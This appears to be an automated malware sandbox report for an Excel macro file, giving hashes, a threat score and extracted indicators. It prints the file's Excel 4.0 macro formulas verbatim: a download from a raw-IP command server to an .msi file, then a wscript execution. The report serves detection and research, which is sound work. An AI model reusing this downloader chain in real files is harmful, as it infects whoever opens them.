Overview

overview

10

Static

static

10

e88133dbf5...a.xlsm

windows7-x64

10

e88133dbf5...a.xlsm

windows10-2004-x64

10

Sharing

Copy URL Twitter E-mail

General

  • Target

    e88133dbf546b70c8226b6d8085f4d4a

  • Size

    6KB

  • MD5

    e88133dbf546b70c8226b6d8085f4d4a

  • SHA1

    f64a13721e413a2e3b51ec9ed602fc7de79d46dd

  • SHA256

    849f1f8d68e4ef6069302abc1bff17e878fa98ab8fdd7e78454c80e01f018af6

  • SHA512

    4eae494c8b15c353644284da4de6db575ea3ad90ae29beb59defc950bdb7b16f8631108e47b94d325df3e3ee2e7aad0e03b43d7aab973789242acbda65504161

  • SSDEEP

    192:NDSHuS5brA2OmmfRU8UhHFBFYuCb98yz35+x:NQuKM2wi1FYTb98yz3E

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php
Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Signatures

Files

  • e88133dbf546b70c8226b6d8085f4d4a
    .xlsm office2007